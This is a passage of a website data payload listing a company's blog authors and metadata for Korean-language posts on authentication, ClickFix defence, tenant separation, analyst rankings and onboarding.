Dive","VqN6eu3CR93UTw1hRHtIYzBMWmdAYHVTudp6IZ2PgIY",{"id":13055,"extension":13056,"meta":13057,"stem":8,"__hash__":13407},"authors_data/authors.json","json",{"path":13058,"Fritz Zurhorst":13059,"Alexander Schlindwein":13065,"Sophie Luna":13071,"Nadine Klein":13079,"Karsten Kleinschmidt":13085,"Julian Wendt":13093,"Holger Bunkradt":13098,"Ralf Mania":13104,"Oliver Kieselbach":13110,"Steffen Schwerdtfeger":13116,"Gunnar Winter":13124,"Jan Petersen":13129,"Thorsten Kunzi":13134,"Moritz Pohl":13138,"Thorben Pöschus":13143,"Christoph Hannebauer":13149,"Marco Scheel":13153,"Christopher Brumm":13158,"Florian Klante":13165,"Niklas Bachmann":13170,"Nils Krautkrämer":13175,"Patrick Treptau":13181,"Peter Beckendorf":13186,"Patrick Sobau":13191,"Jörg Wunderlich":13196,"Michael Breither":13200,"Christian Kanja":13205,"Zeba Hoffmann":13211,"Jochen Fröhlich":13216,"Jan Geisbauer":13220,"Gerrit Reinke":13232,"Christian Kordel":13238,"Stephan Wälde":13242,"Carolin Kanja":13247,"Adrian Ritter":13253,"Marvin Bangert":13258,"Thorsten Pickhan":13264,"Christian Lorenz":13270,"Denis Böhm":13275,"Fabian Bader":13280,"Juan Jose Fernandez Perez":13286,"Mahschid Sayyar":13291,"Benjamin Dassow":13296,"Markus Walschburger":13301,"Jonathan Haist":13306,"Daniel Rohregger":13311,"Thomas Naunheim":13316,"Florian Stöckl":13321,"Pascal Asch":13326,"Markus Kättner":13330,"Anna Ulbricht":13337,"Annette Brauns":13344,"body":13350,"title":13406},"/authors",{"display_name":13060,"avatar":13061,"permalink":13062,"linkedin":13063,"imageOffsetTop":13064},"Fritz Zurhorst","people/people-fritz-zurhorst.png","/authors/fritz-zurhorst","friedemann-z","72%",{"display_name":13066,"avatar":13067,"permalink":13068,"twitter":13069,"linkedin":13070},"Alexander Schlindwein","people/people-alexander-rudolph.png","/authors/alexander-schlindwein","AlexanderOnIT","schlindwein-alexander",{"display_name":13072,"avatar":13073,"permalink":13074,"twitter":13075,"linkedin":13076,"imageOffsetLeft":13077,"imageOffsetTop":13078},"Sophie Luna","people/people-sophie-luna.jpg","/authors/sophie-luna","glueckkanjagab","../company/glueckkanja-gab","58%","67%",{"display_name":13080,"avatar":13081,"permalink":13082,"twitter":13083,"linkedin":13084,"imageOffsetTop":13064},"Nadine Klein","people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","nadine-kern",{"display_name":13086,"avatar":13087,"permalink":13088,"twitter":13089,"linkedin":13090,"imageOffsetTop":13091,"imageOffsetLeft":13092},"Karsten Kleinschmidt","/c_pad,w_800,h_700/people/karsten-kleinschmidt.jpg","/authors/karsten-kleinschmidt","KarstenonIT","karstenkleinschmidt","60%","57%",{"display_name":13094,"avatar":13095,"permalink":13096,"linkedin":13097},"Julian Wendt","people/people-julian-wendt.png","/authors/julian-wendt","julian-wendt",{"display_name":13099,"avatar":13100,"permalink":13101,"linkedin":13102,"twitter":13103},"Holger Bunkradt","people/people-holger-bunkradt.png","/authors/holger-bunkradt","holger-bunkradt-12b5053b","hbunkradt",{"display_name":13105,"avatar":13106,"permalink":13107,"linkedin":13108,"twitter":13109},"Ralf Mania","people/people-ralf-mania.png","/authors/ralf-mania","ralf-mania-146a2757","RaMa1976",{"display_name":13111,"avatar":13112,"permalink":13113,"linkedin":13114,"twitter":13115},"Oliver Kieselbach","people/people-oliver-kieselbach.png","/authors/oliver-kieselbach","oliver-kieselbach-a4a3409","okieselbT",{"display_name":13117,"avatar":13118,"permalink":13119,"linkedin":13120,"twitter":13121,"imageOffsetTop":13122,"imageOffsetLeft":13123},"Steffen Schwerdtfeger","people/people-steffen-schwerdtfeger.png","/authors/steffen-schwerdtfeger","steffen-schwerdtfeger","SteffenAtCloud","79%","51%",{"display_name":13125,"avatar":13126,"permalink":13127,"twitter":13075,"linkedin":13128},"Gunnar Winter","people/people-gunnar-winter.jpg","/authors/gunnar-winter","company/glueckkanja-gab",{"display_name":13130,"avatar":13131,"permalink":13132,"twitter":13075,"linkedin":13133},"Jan Petersen","people/jan-petersen.png","/authors/jan-petersen","jan-petersen-26a901",{"display_name":13135,"avatar":13136,"permalink":13137,"twitter":13075,"linkedin":13128,"imageOffsetTop":13064},"Thorsten Kunzi","people/author-thorsten-kunzi.png","/authors/thorsten-kunzi",{"display_name":13139,"avatar":13140,"permalink":13141,"twitter":13075,"linkedin":13142},"Dr. Moritz Pohl","people/people-moritz-pohl.png","/authors/moritz-pohl","dr-moritz-pohl",{"display_name":13144,"avatar":13145,"permalink":13146,"twitter":13147,"linkedin":13148},"Thorben Pöschus","people/thorben.poeschus.png","/authors/thorben-poeschus","TPO901","thorben-pöschus-624693b7",{"display_name":13150,"avatar":13151,"permalink":13152,"twitter":13075,"linkedin":13128,"imageOffsetTop":13064},"Dr. Christoph Hannebauer","people/people-christoph-hannebauer.png","/authors/christoph-hannebauer",{"display_name":13154,"avatar":13155,"permalink":13156,"twitter":13157,"linkedin":13157},"Marco Scheel","people/people-marco-scheel.png","/authors/marco-scheel","marcoscheel",{"display_name":13159,"avatar":13160,"permalink":13161,"twitter":13162,"linkedin":13163,"imageOffsetTop":13164},"Christopher Brumm","people/people-christopher-brumm.jpg","/authors/christopher-brumm","cbrhh","christopherbrumm","66%",{"display_name":13166,"avatar":13167,"permalink":13168,"linkedin":13169,"twitter":13075},"Florian Klante","people/florian-klante.jpg","/authors/florian-klante","florian-klante-6031b31b",{"display_name":13171,"avatar":13172,"permalink":13173,"linkedin":13174,"twitter":13075},"Niklas Bachmann","people/niklas.bachmann.png","/authors/niklas-bachmann","niklas-bachmann-66a863158",{"display_name":13176,"avatar":13177,"permalink":13178,"twitter":13179,"linkedin":13180},"Nils Krautkrämer","people/nils-krautkraemer.png","/authors/nils-krautkraemer","KrauNils","nils-krautkrämer-8b04bb250",{"display_name":13182,"avatar":13183,"permalink":13184,"linkedin":13185,"twitter":13075},"Patrick Treptau","people/people-patrick-treptau.png","/authors/patrick-traptau","ptreptau",{"display_name":13187,"avatar":13188,"permalink":13189,"linkedin":13190,"twitter":13075,"imageOffsetTop":13064},"Peter Beckendorf","people/peter-beckendorf.png","/authors/peter-beckendorf","peter-beckendorf-29a239b1",{"display_name":13192,"avatar":13193,"permalink":13194,"linkedin":13195,"twitter":13075},"Patrick Sobau","people/patrick-sobau.png","/authors/patrick-sobau","patrick-sobau",{"display_name":13197,"avatar":13198,"permalink":13199,"twitter":13075},"Jörg Wunderlich","people/joerg-wunderlich.png","/authors/joerg-wunderlich",{"display_name":13201,"avatar":13202,"permalink":13203,"twitter":13075,"linkedin":13204},"Michael Breither","people/people-michael-breither.jpg","/authors/michael-breither","michaelbreither",{"display_name":13206,"avatar":13207,"permalink":13208,"twitter":13209,"linkedin":13210},"Christian Kanja","people/people-christian-kanja.png","/authors/christian-kanja","cekageka","christian-kanja",{"display_name":13212,"avatar":13213,"permalink":13214,"linkedin":13215,"twitter":13075},"Zeba Hoffmann","people/zeba-hoffmann.png","/authors/zeba-hoffmann","zebahoffmann",{"display_name":13217,"avatar":13218,"permalink":13219,"twitter":13075,"linkedin":13128},"Jochen Fröhlich","people/people-jochen-froehlich.png","/authors/jochen-froehlich",{"display_name":13221,"avatar":13222,"permalink":13223,"twitter":13224,"linkedin":13224,"imageOffsetTop":13064,"socials":13225},"Jan Geisbauer","people/people-jan-geisbauer-csoc.png","/authors/jan-geisbauer","JanGeisbauer",[13226,13229],{"text":13227,"href":13228},"Blog","https://emptydc.com",{"text":13230,"href":13231},"Podcast","https://hairlessinthecloud.com",{"display_name":13233,"avatar":13234,"permalink":13235,"twitter":13236,"linkedin":13237},"Gerrit Reinke","people/gerrit-reinke.png","/authors/gerrit-reinke","GLWRe","glwr",{"display_name":13239,"avatar":13240,"permalink":13241,"twitter":13075,"linkedin":13128},"Christian Kordel","people/christian-kordel.png","/authors/christian-kordel",{"display_name":13243,"avatar":13244,"permalink":13245,"twitter":13246,"linkedin":13128},"Stephan Wälde","people/people-stephan-waelde.png","/authors/stephan-waelde","stephanwaelde",{"display_name":13248,"avatar":13249,"permalink":13250,"twitter":13251,"linkedin":13252},"Carolin Kanja","people/people-carolin-kanja.jpg","/authors/carolin-kanja","fraukanja","carolin-kanja",{"display_name":13254,"avatar":13255,"permalink":13256,"twitter":13257,"linkedin":13257},"Adrian Ritter","people/people-adrian-ritter.png","/authors/adrian-ritter","adrianritter",{"display_name":13259,"avatar":13260,"permalink":13261,"twitter":13262,"linkedin":13263},"Marvin Bangert","people/people-marvin-bangert.png","/authors/marvin-bangert","marvinbangert","marvin-bangert",{"display_name":13265,"avatar":13266,"permalink":13267,"twitter":13268,"linkedin":13269},"Thorsten Pickhan","people/people-thorsten-pickhan.png","/authors/thorsten-pickhan","tpickhan","thorsten-pickhan",{"display_name":13271,"avatar":13272,"permalink":13273,"linkedin":13274,"twitter":13075},"Christian Lorenz","people/people-christian-lorenz.png","/authors/christian-lorenz","christianlorenz95",{"display_name":13276,"avatar":13277,"permalink":13278,"linkedin":13279,"twitter":13075},"Denis Böhm","people/people-denis-boehm.png","/authors/denis-boehm","denis-böhm-3bb834135",{"display_name":13281,"avatar":13282,"permalink":13283,"linkedin":13284,"twitter":13285},"Fabian Bader","people/people-fabian-bader.jpg","/authors/fabian-bader","fabianbader","fabian_bader",{"display_name":13287,"avatar":13288,"permalink":13289,"linkedin":13290},"Juan Jose Fernandez Perez","people/people-juan-jose-fernandez.jpg","/authors/juan-jose-fernandez-perez","juan-jose-fernandez-perez-8016055",{"display_name":13292,"avatar":13293,"permalink":13294,"linkedin":13295},"Mahschid Sayyar","people/people-mahschid-sayyar.jpg","/authors/mahschid-sayyar","mahschid-sayyar-97544463",{"display_name":13297,"avatar":13298,"permalink":13299,"linkedin":13300},"Benjamin Dassow","people/people-benjamin-dassow.jpg","/authors/benjamin-dassow","benjamin-dassow",{"display_name":13302,"avatar":13303,"permalink":13304,"linkedin":13305},"Markus Walschburger","people/people-markus-walschburger.jpg","/authors/markus-walschburger","markus-walschburger",{"display_name":13307,"avatar":13308,"permalink":13309,"linkedin":13310,"imageOffsetTop":13064},"Jonathan Haist","people/people-jonathan-haist.jpg","/authors/jonathan-haist","jonathanhaist",{"display_name":13312,"avatar":13313,"permalink":13314,"linkedin":13315,"imageOffsetTop":13064},"Daniel Rohregger","people/people-daniel-rohregger.jpg","/authors/daniel-rohregger","drohregger",{"display_name":13317,"avatar":13318,"permalink":13319,"linkedin":13320,"imageOffsetTop":13164},"Thomas Naunheim","people/people-thomas-naunheim.jpg","/authors/thomas-naunheim","thomasnaunheim",{"display_name":13322,"avatar":13323,"permalink":13324,"linkedin":13325,"imageOffsetTop":13164},"Florian Stöckl","people/people-florian-stoeckl.jpg","/authors/florian-stoeckl","florianstoeckl",{"display_name":523,"avatar":13327,"permalink":13328,"linkedin":13329,"imageOffsetTop":13164},"people/Pascal.Asch.648.jpg","/authors/pascal-asch","pascal-asch",{"display_name":13331,"avatar":13332,"permalink":13333,"linkedin":13334,"imageOffsetTop":13335,"imageOffsetLeft":13336},"Markus Kättner","people/markus-kaettner.jpg","/authors/markus-kaettner","markus-kättner-b600119","62%","63%",{"display_name":13338,"avatar":13339,"permalink":13340,"linkedin":13341,"imageOffsetTop":13342,"imageOffsetLeft":13343},"Anna Ulbricht","people/anna-katharina.ulbricht-09.png","/authors/anna-ulbricht","anna-katharina-u-a67702199","70%","50%",{"display_name":13345,"avatar":13346,"permalink":13347,"linkedin":13348,"imageOffsetTop":13349,"imageOffsetLeft":13091},"Annette Brauns","people/Annette-Brauns-8.jpg","/authors/annette-brauns","annette-brauns","95%",{"Fritz Zurhorst":13351,"Alexander Schlindwein":13352,"Sophie Luna":13353,"Nadine Klein":13354,"Karsten Kleinschmidt":13355,"Julian Wendt":13356,"Holger Bunkradt":13357,"Ralf Mania":13358,"Oliver Kieselbach":13359,"Steffen Schwerdtfeger":13360,"Gunnar Winter":13361,"Jan Petersen":13362,"Thorsten Kunzi":13363,"Moritz Pohl":13364,"Thorben Pöschus":13365,"Christoph Hannebauer":13366,"Marco Scheel":13367,"Christopher Brumm":13368,"Florian Klante":13369,"Niklas Bachmann":13370,"Nils Krautkrämer":13371,"Patrick Treptau":13372,"Peter Beckendorf":13373,"Patrick Sobau":13374,"Jörg Wunderlich":13375,"Michael Breither":13376,"Christian Kanja":13377,"Zeba Hoffmann":13378,"Jochen Fröhlich":13379,"Jan Geisbauer":13380,"Gerrit Reinke":13384,"Christian Kordel":13385,"Stephan Wälde":13386,"Carolin Kanja":13387,"Adrian Ritter":13388,"Marvin Bangert":13389,"Thorsten Pickhan":13390,"Christian Lorenz":13391,"Denis Böhm":13392,"Fabian Bader":13393,"Juan Jose Fernandez Perez":13394,"Mahschid Sayyar":13395,"Benjamin Dassow":13396,"Markus Walschburger":13397,"Jonathan Haist":13398,"Daniel Rohregger":13399,"Thomas Naunheim":13400,"Florian Stöckl":13401,"Pascal Asch":13402,"Markus Kättner":13403,"Anna Ulbricht":13404,"Annette Brauns":13405},{"display_name":13060,"avatar":13061,"permalink":13062,"linkedin":13063,"imageOffsetTop":13064},{"display_name":13066,"avatar":13067,"permalink":13068,"twitter":13069,"linkedin":13070},{"display_name":13072,"avatar":13073,"permalink":13074,"twitter":13075,"linkedin":13076,"imageOffsetLeft":13077,"imageOffsetTop":13078},{"display_name":13080,"avatar":13081,"permalink":13082,"twitter":13083,"linkedin":13084,"imageOffsetTop":13064},{"display_name":13086,"avatar":13087,"permalink":13088,"twitter":13089,"linkedin":13090,"imageOffsetTop":13091,"imageOffsetLeft":13092},{"display_name":13094,"avatar":13095,"permalink":13096,"linkedin":13097},{"display_name":13099,"avatar":13100,"permalink":13101,"linkedin":13102,"twitter":13103},{"display_name":13105,"avatar":13106,"permalink":13107,"linkedin":13108,"twitter":13109},{"display_name":13111,"avatar":13112,"permalink":13113,"linkedin":13114,"twitter":13115},{"display_name":13117,"avatar":13118,"permalink":13119,"linkedin":13120,"twitter":13121,"imageOffsetTop":13122,"imageOffsetLeft":13123},{"display_name":13125,"avatar":13126,"permalink":13127,"twitter":13075,"linkedin":13128},{"display_name":13130,"avatar":13131,"permalink":13132,"twitter":13075,"linkedin":13133},{"display_name":13135,"avatar":13136,"permalink":13137,"twitter":13075,"linkedin":13128,"imageOffsetTop":13064},{"display_name":13139,"avatar":13140,"permalink":13141,"twitter":13075,"linkedin":13142},{"display_name":13144,"avatar":13145,"permalink":13146,"twitter":13147,"linkedin":13148},{"display_name":13150,"avatar":13151,"permalink":13152,"twitter":13075,"linkedin":13128,"imageOffsetTop":13064},{"display_name":13154,"avatar":13155,"permalink":13156,"twitter":13157,"linkedin":13157},{"display_name":13159,"avatar":13160,"permalink":13161,"twitter":13162,"linkedin":13163,"imageOffsetTop":13164},{"display_name":13166,"avatar":13167,"permalink":13168,"linkedin":13169,"twitter":13075},{"display_name":13171,"avatar":13172,"permalink":13173,"linkedin":13174,"twitter":13075},{"display_name":13176,"avatar":13177,"permalink":13178,"twitter":13179,"linkedin":13180},{"display_name":13182,"avatar":13183,"permalink":13184,"linkedin":13185,"twitter":13075},{"display_name":13187,"avatar":13188,"permalink":13189,"linkedin":13190,"twitter":13075,"imageOffsetTop":13064},{"display_name":13192,"avatar":13193,"permalink":13194,"linkedin":13195,"twitter":13075},{"display_name":13197,"avatar":13198,"permalink":13199,"twitter":13075},{"display_name":13201,"avatar":13202,"permalink":13203,"twitter":13075,"linkedin":13204},{"display_name":13206,"avatar":13207,"permalink":13208,"twitter":13209,"linkedin":13210},{"display_name":13212,"avatar":13213,"permalink":13214,"linkedin":13215,"twitter":13075},{"display_name":13217,"avatar":13218,"permalink":13219,"twitter":13075,"linkedin":13128},{"display_name":13221,"avatar":13222,"permalink":13223,"twitter":13224,"linkedin":13224,"imageOffsetTop":13064,"socials":13381},[13382,13383],{"text":13227,"href":13228},{"text":13230,"href":13231},{"display_name":13233,"avatar":13234,"permalink":13235,"twitter":13236,"linkedin":13237},{"display_name":13239,"avatar":13240,"permalink":13241,"twitter":13075,"linkedin":13128},{"display_name":13243,"avatar":13244,"permalink":13245,"twitter":13246,"linkedin":13128},{"display_name":13248,"avatar":13249,"permalink":13250,"twitter":13251,"linkedin":13252},{"display_name":13254,"avatar":13255,"permalink":13256,"twitter":13257,"linkedin":13257},{"display_name":13259,"avatar":13260,"permalink":13261,"twitter":13262,"linkedin":13263},{"display_name":13265,"avatar":13266,"permalink":13267,"twitter":13268,"linkedin":13269},{"display_name":13271,"avatar":13272,"permalink":13273,"linkedin":13274,"twitter":13075},{"display_name":13276,"avatar":13277,"permalink":13278,"linkedin":13279,"twitter":13075},{"display_name":13281,"avatar":13282,"permalink":13283,"linkedin":13284,"twitter":13285},{"display_name":13287,"avatar":13288,"permalink":13289,"linkedin":13290},{"display_name":13292,"avatar":13293,"permalink":13294,"linkedin":13295},{"display_name":13297,"avatar":13298,"permalink":13299,"linkedin":13300},{"display_name":13302,"avatar":13303,"permalink":13304,"linkedin":13305},{"display_name":13307,"avatar":13308,"permalink":13309,"linkedin":13310,"imageOffsetTop":13064},{"display_name":13312,"avatar":13313,"permalink":13314,"linkedin":13315,"imageOffsetTop":13064},{"display_name":13317,"avatar":13318,"permalink":13319,"linkedin":13320,"imageOffsetTop":13164},{"display_name":13322,"avatar":13323,"permalink":13324,"linkedin":13325,"imageOffsetTop":13164},{"display_name":523,"avatar":13327,"permalink":13328,"linkedin":13329,"imageOffsetTop":13164},{"display_name":13331,"avatar":13332,"permalink":13333,"linkedin":13334,"imageOffsetTop":13335,"imageOffsetLeft":13336},{"display_name":13338,"avatar":13339,"permalink":13340,"linkedin":13341,"imageOffsetTop":13342,"imageOffsetLeft":13343},{"display_name":13345,"avatar":13346,"permalink":13347,"linkedin":13348,"imageOffsetTop":13349,"imageOffsetLeft":13091},"Authors","1csawlkJxRljy93GTOnXEkwLqAv9Lcj-apxRvoodAOY",{"list":13409,"authors":13623},[13410,13427,13441,13455,13471,13484,13497,13510,13522,13538,13552,13567,13583,13594,13607],{"id":13411,"title":13412,"author":13413,"cta":494,"description":593,"hideInRecent":484,"layout":12927,"meta":13414,"moment":13419,"path":13420,"stem":13421,"tags":13422,"webcast":484},"content_ko/posts/2026-09-22-end-of-mfa-sms.md","MFA SMS의 종말",[13086],{"lang":12929,"date":13415,"categories":13416,"blogtitlepic":13417,"customExcerpt":13418},"2026-09-21",[12934],"head-conditional-access.jpg","기업이 지금 피싱에 강하고 가능한 한 비밀번호 없는 인증 방식으로 전환해야 하는 이유.","2026-09-22","/posts/2026-09-22-end-of-mfa-sms","posts/2026-09-22-end-of-mfa-sms",[12934,13423,13424,13425,13426],"Authentication","Microsoft Entra ID","MFA","Passkeys",{"id":13428,"title":13429,"author":13430,"cta":494,"description":593,"hideInRecent":484,"layout":12927,"meta":13431,"moment":13415,"path":13435,"stem":13436,"tags":13437,"webcast":484},"content_ko/posts/2026-09-21-clickfix-prevent-detect.md","ClickFix. 사용자가 곧 익스플로잇일 때, 그리고 이를 멈추는 방법",[13060,13080],{"lang":12929,"date":13415,"categories":13432,"blogtitlepic":13433,"customExcerpt":13434},[12934],"head-clickfix.jpg","ClickFix는 사용자를 자기 자신의 공격자로 만듭니다. 가짜 CAPTCHA 하나, 복사·붙여넣기 한 번으로 악성 코드가 메모리에서 실행되고, 디스크에는 아무것도 남지 않습니다. Microsoft Defender가 이 공격을 어떻게 탐지하는지, 탐지가 어디서 한계에 부딪히는지, 그리고 RunMRU 헌트와 네 개의 보호 레이어로 그 공백을 어떻게 메우는지 살펴봅니다.","/posts/2026-09-21-clickfix-prevent-detect","posts/2026-09-21-clickfix-prevent-detect",[13438,13439,13440],"Defender","SOC","Endpoint Security",{"id":13442,"title":13443,"author":13444,"cta":494,"description":593,"hideInRecent":484,"layout":12927,"meta":13445,"moment":13415,"path":13449,"stem":13450,"tags":13451,"webcast":484},"content_ko/posts/2026-09-21-red-tenant-dark-tenant-cio.md","관리 업무와 일상 업무를 한 컴퓨터에서? Game Over.",[13221],{"lang":12929,"date":13415,"categories":13446,"blogtitlepic":13447,"customExcerpt":13448},[12934],"head-game-over-en.jpg","CIO에게 테넌트 하나로는 충분하지 않은 이유, 그리고 두 번째 테넌트가 좀처럼 함께 고려되지 않는 이유입니다. Managed Red Tenant는 관리 업무를 오피스 환경으로부터 아키텍처 차원에서 분리하고, Managed Dark Tenant는 방어가 무너졌을 때도 기업이 계속 움직일 수 있게 합니다. 이것이 운영 모델과 SOC 신호, 그리고 NISG 2026에 따른 입증 의무에 어떤 의미를 갖는지 살펴봅니다.","/posts/2026-09-21-red-tenant-dark-tenant-cio","posts/2026-09-21-red-tenant-dark-tenant-cio",[12934,13452,13453,13454],"Privileged Access","Zero Trust","NIS2",{"id":13456,"title":13457,"author":13458,"cta":494,"description":13459,"hideInRecent":484,"layout":12927,"meta":13460,"moment":13461,"path":13466,"stem":13467,"tags":13468,"webcast":484},"content_ko/posts/2026-08-08-isg-germany-2026.md","네 번의 Leader. ISG 독일 연구 2026 속 glueckkanja",[13248],"ISG는 올해 연구의 이름을 바꿨습니다. Microsoft Cloud Ecosystem은 Microsoft AI and Cloud Ecosystem이 되었고, 이름과 함께 기준도 옮겨 갔습니다. 이제 평가 대상은 누가 Microsoft 플랫폼을 도입하는지가 아니라, 누가 Copilot과 에이전트, AI 워크로드를 통제 가능하게 운영하는지입니다. 새로운 기준은 저희의 위치를 바꾸지 않았습니다. ISG Provider Lens® 연구 독일 2026은 저희를 네 개 사분면의 Leader로 포지셔닝합니다. Microsoft Productivity and Business Process Services와 Azure Managed Services에서 각각 Large Market과 Mid Market입니다. 2021년, 2023년, 2024년, 2025년에 이어 독일에서 다섯 번째 Leader 등급이며, 스위스에서는 2주 전에 Leader 사분면으로의 도약이 있었습니다.",{"lang":12929,"date":13461,"categories":13462,"blogtitlepic":13464,"customExcerpt":13465},"2026-08-08",[13463],"Corporate","head-isg-de-2026.png","ISG Provider Lens® 연구 2026은 독일에서 glueckkanja를 네 개 사분면의 Leader로 포지셔닝했습니다. Microsoft Productivity and Business Process Services와 Azure Managed Services에서 각각 Large Market과 Mid Market입니다. 연구의 이름은 이제 Microsoft AI and Cloud Ecosystem이 되었고, 기준도 옮겨 갔습니다. 평가 대상은 AI와 에이전트 워크로드를 통제 가능하게 운영하는 곳입니다.","/posts/2026-08-08-isg-germany-2026","posts/2026-08-08-isg-germany-2026",[13469,13470],"Award","ISG",{"id":13472,"title":13473,"author":13474,"cta":494,"description":13475,"hideInRecent":484,"layout":12927,"meta":13476,"moment":13477,"path":13481,"stem":13482,"tags":13483,"webcast":484},"content_ko/posts/2026-07-31-isg-switzerland-2026.md","Rising Star에서 Leader로. ISG 스위스 연구 2026 속 glueckkanja",[13248],"2024년 저희는 glueckkanja Switzerland AG를 설립하고 베른 Bahnhofplatz 10b의 zentroom에 사무실을 마련했습니다. 2025년 ISG는 스위스 시장에서 저희를 Rising Star로 분류했습니다. 애널리스트들이 Leader 사분면으로 도약할 것으로 보는 공급업체라는 뜻이었습니다. 이제 그 도약이 기록되었습니다. ISG Provider Lens® 연구 2026은 스위스에서 저희를 Microsoft AI and Cloud Ecosystem 사분면의 Leader로, Azure Managed Services와 Microsoft Productivity and Business Process Services 영역에서 포지셔닝했습니다.",{"lang":12929,"date":13477,"categories":13478,"blogtitlepic":13479,"customExcerpt":13480},"2026-07-31",[13463],"head-isg-ch-2026.png","ISG Provider Lens® 연구 2026은 스위스에서 glueckkanja를 Microsoft AI and Cloud Ecosystem 사분면의 Leader로, Azure Managed Services와 Microsoft Productivity and Business Process Services 영역에서 포지셔닝했습니다. 베른 시장 진출 2년 만에, Rising Star 선정 1년 만의 일입니다.","/posts/2026-07-31-isg-switzerland-2026","posts/2026-07-31-isg-switzerland-2026",[13469,13470],{"id":13485,"title":13486,"author":13487,"cta":494,"description":593,"hideInRecent":484,"layout":12927,"meta":13488,"moment":13489,"path":13493,"stem":13494,"tags":13495,"webcast":484},"content_ko/posts/2026-07-24-outbreak-openai-hugging-face.md","Outbreak. OpenAI/Hugging Face 사건이 말해 주는 것과 말해 주지 않는 것",[13221],{"lang":12929,"date":13489,"categories":13490,"blogtitlepic":13491,"customExcerpt":13492},"2026-07-24",[12934],"head-outbreak.jpg","AI 에이전트가 자신의 테스트 환경에서 탈출해 제로데이를 찾아내고 다른 기업을 해킹했습니다. 각본처럼 들리지만 2026년 7월에 실제로 일어난 일입니다. 이제 차분하게 자리를 잡아 볼 시간입니다. 약간의 심리학, 두 명의 보안 베테랑, 그리고 이것이 여러분의 방어에 무엇을 의미하는지에 대한 질문과 함께.","/posts/2026-07-24-outbreak-openai-hugging-face","posts/2026-07-24-outbreak-openai-hugging-face",[13496,13439,13453],"AI",{"id":13498,"title":13499,"author":13500,"cta":494,"description":13501,"hideInRecent":484,"layout":12927,"meta":13502,"moment":13503,"path":13507,"stem":13508,"tags":13509,"webcast":484},"content_ko/posts/2026-07-22-isg-cybersecurity-2026.md","Leader 그리고 Rising Star. ISG 사이버보안 연구 2026 속 glueckkanja",[13248],"사분면에 새로 진입해 곧바로 Leader가 되었습니다. ISG Provider Lens® 연구 \"Cybersecurity – Services and Solutions 2026\"은 glueckkanja를 독일 중견·중소기업을 위한 Next-Gen SOC/MDR Services 영역의 Leader로 포지셔닝했습니다. Next-Gen SOC/MDR Services 전체 시장에서 ISG는 저희를 Rising Star로 선정했습니다. 즉, 애널리스트들이 향후 12~24개월 안에 Leader 사분면으로 도약할 것으로 보는 공급업체라는 뜻입니다.",{"lang":12929,"date":13503,"categories":13504,"blogtitlepic":13505,"customExcerpt":13506},"2026-07-22",[13463],"head-isg-cybersecurity-2026.png","ISG Provider Lens® 연구 Cybersecurity 2026이 glueckkanja를 Next-Gen SOC/MDR Services(Midmarket) 사분면의 Leader로 선정했습니다. Next-Gen SOC/MDR Services 전체 시장에서는 저희가 Rising Star입니다. ISG는 저희의 시장 평균을 웃도는 성장, 깊은 Microsoft 보안 전문성, 그리고 독일에서 운영되는 24/7 SOC를 인정했습니다.","/posts/2026-07-22-isg-cybersecurity-2026","posts/2026-07-22-isg-cybersecurity-2026",[13469,13470,12934],{"id":13511,"title":13512,"author":13513,"cta":494,"description":13514,"hideInRecent":484,"layout":12927,"meta":13515,"moment":13516,"path":13519,"stem":13520,"tags":13521,"webcast":484},"content_ko/posts/2026-07-06-the-holy-trinity.md","The Holy Trinity: AI가 실제로 일하려면 무엇이 필요한가",[13248],"어느 제조 기업이 자사의 SKU 14,000개 중 실제로 수익을 내는 것이 무엇인지 알고 싶어 합니다. 그 답은 단 하나의 데이터 포인트도 서로 주고받은 적이 없는 세 개의 시스템에 흩어져 있습니다. 얼마 전까지만 해도 그 답을 얻는 데는 세 개 부서와 2주, 그리고 상당한 선의가 필요했습니다. 2026년 초부터는 AI가 이 질문에 몇 분 안에 답할 수 있습니다. 데이터를 뒤지고, 연관 관계를 만들고, 권고안을 내놓는 것입니다. 단, AI가 접근할 수 있다는 전제에서입니다.",{"lang":12929,"date":13516,"categories":13517,"blogtitlepic":13518},"2026-07-06",[131],"head-the-holy-trinity","/posts/2026-07-06-the-holy-trinity","posts/2026-07-06-the-holy-trinity",[13496,131],{"id":13523,"title":13524,"author":13525,"cta":494,"description":13526,"hideInRecent":484,"layout":12927,"meta":13527,"moment":13528,"path":13532,"stem":13533,"tags":13534,"webcast":484},"content_ko/posts/2026-07-01-onboarding-process.md","계약서에 서명하셨습니다. 저희 온보딩은 이렇게 진행됩니다",[13338],"온보딩은 실제로 어떻게 진행되나요? 지원자들과 이야기를 나누다 보면 거듭 마주치는 질문입니다. 온보딩이 삐걱대며 흘러가는 경험을 이미 해 본 분이 많기 때문입니다. 그래서 저희는 처음부터 여러분이 좋은 느낌을 받으실 수 있도록 하는 것을 더욱 중요하게 생각합니다.",{"lang":12929,"date":13528,"categories":13529,"blogtitlepic":13530,"customExcerpt":13531},"2026-07-01",[13463],"Onboarding_Blogheader","계약서에 서명을 마쳤고, 가장 큰 첫걸음은 이미 내디뎠습니다. 그렇다면 이제 어떻게 될까요? PreBoarding부터 팀에서 보내는 첫 주까지, 저희 온보딩의 무대 뒤로 여러분을 안내합니다.","/posts/2026-07-01-onboarding-process","posts/2026-07-01-onboarding-process",[13535,13536,13537],"Employer Branding","Onboarding","Unternehmenskultur",{"id":13539,"title":13540,"author":13541,"cta":494,"description":13542,"hideInRecent":484,"layout":12927,"meta":13543,"moment":13544,"path":13548,"stem":13549,"tags":13550,"webcast":484},"content_ko/posts/2026-06-26-frontier-partner.md","Microsoft Frontier Partner: 우리는 그 일원입니다",[13248],"Microsoft 파트너 생태계에는 다양한 인증이 존재하지만, Frontier Partner Badge는 그 구조 자체에서 다른 인증들과 구별됩니다. 이 배지는 신청할 수 있는 것이 아니라, Microsoft의 주도로 극소수의 파트너에게만 부여되며, 대상 파트너는 한 가지 분야에서 두각을 나타내는 것이 아니라 여러 분야에서 동시에 역량을 입증해야 합니다. 이때 Microsoft는 Cloud & AI Platforms, AI Business Solutions, Security 세 영역에서 입증된 역량을 동일한 비중으로 검증하며, 이를 통해 AI를 기존 IT 위에 얹는 부가물로 이해하는 것이 아니라 아이덴티티에서 엔드포인트를 거쳐 실제 운영 중인 AI까지 이어지는 일관된 아키텍처의 결과로 이해하는 기업을 대상으로 삼습니다.",{"lang":12929,"date":13544,"categories":13545,"blogtitlepic":13546,"customExcerpt":13547},"2026-06-26",[13463],"head-frontier-partner-badge.jpg","얼마 전 Microsoft AI Cloud Partner Program에 새로운 최고 등급의 인증인 Frontier Partner Badge가 도입되었습니다. Microsoft는 이 배지를 전 세계에서 극소수의 파트너에게만 부여하는데, 이들은 